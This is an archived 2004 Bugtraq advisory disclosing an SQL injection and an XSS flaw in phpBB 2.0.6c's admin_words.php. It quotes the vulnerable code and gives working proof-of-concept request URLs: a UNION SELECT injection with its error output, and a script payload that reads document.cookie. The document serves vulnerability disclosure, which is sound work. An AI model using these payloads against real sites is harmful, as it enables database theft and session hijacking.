lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20040322165811.13527.qmail@www.securityfocus.com>
Date: 22 Mar 2004 16:58:11 -0000
From: Janek Vind <come2waraxe@...oo.com>
To: bugtraq@...urityfocus.com
Subject: [waraxe-2004-SA#009 - Non-critical Sql injection and XSS bug in
    PhpBB 2.0.6c]






{================================================================================}
{                              [waraxe-2004-SA#009]                              }
{================================================================================}
{                                                                                }
{            [ Non-critical Sql injection and XSS bug in PhpBB 2.0.6c ]          }
{                                                                                }
{================================================================================}
                                                                                                                                
Author: Janek Vind "waraxe"
Date: 16. March 2004
Location: Estonia, Tartu



Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

PhpBB is widely used and very popular forum software, written in php.
Homepage:  http://www.phpbb.com/


Vulnerabilities:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Original code from  admin_words.php, $Id: admin_words.php,v 1.10.2.2 2002/05/12 15:57:45,
starting from line 74:

-------------------------------

if( $mode == "edit" )
		{
			if( $word_id )
			{
				$sql = "SELECT * 
					FROM " . WORDS_TABLE . " 
					WHERE word_id = $word_id";
				if(!$result = $db->sql_query($sql))
				{
					message_die(GENERAL_ERROR, "Could not query words table", "Error", __LINE__, __FILE__, $sql);
				}

				$word_info = $db->sql_fetchrow($result);
				$s_hidden_fields .= '<input type="hidden" name="id" value="' . $word_id . '" />';
			}
			else
			{
				message_die(GENERAL_MESSAGE, $lang['No_word_selected']);
			}
		}

--------------------------------

As we can see, parameter $word_id is submitted to sql query WITHOUT single quotes, therefore
it's possible sql injection, for example with UNION method:

 http://localhost/phpbb206c/admin/admin_words.php?mode=edit&id=-1%20UNION%20ALL%20SELECT%20null/*

and we get error feedback:

------------------------------------------------

Error Could not query words table

DEBUG MODE

SQL Error : 1222 The used SELECT statements have a different number of columns

SELECT * FROM phpbb_words WHERE word_id = -1 UNION ALL SELECT null/*

Line : 83
File : D:\apache_wwwroot\phpbb206c\admin\admin_words.php

------------------------------------------------

By implementing so-called "blind" sql injection methods, we can pull out from sql database any
information. So why i'm categorizing this bug as "non-critical"? Because we need first log in as 
forum administrator to make successful attack. So it's not so "useful" security bug ;)
But let's think again - what, if we make such request:


http://localhost/phpbb206c/admin/admin_words.php?mode=edit&id=1/*">&lt;script&gt;alert(document.cookie);</script
 

So, in this way we can turn not-so-useful sql injection bug to very useful xss exploit.




Greetings:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    Greets to torufoorum staff and to all IT security related people in Estonia! Tervitused!
Special greets to ulljobu!


Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    come2waraxe@...oo.com
    Janek Vind "waraxe"

---------------------------------- [ EOF ] ------------------------------------


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ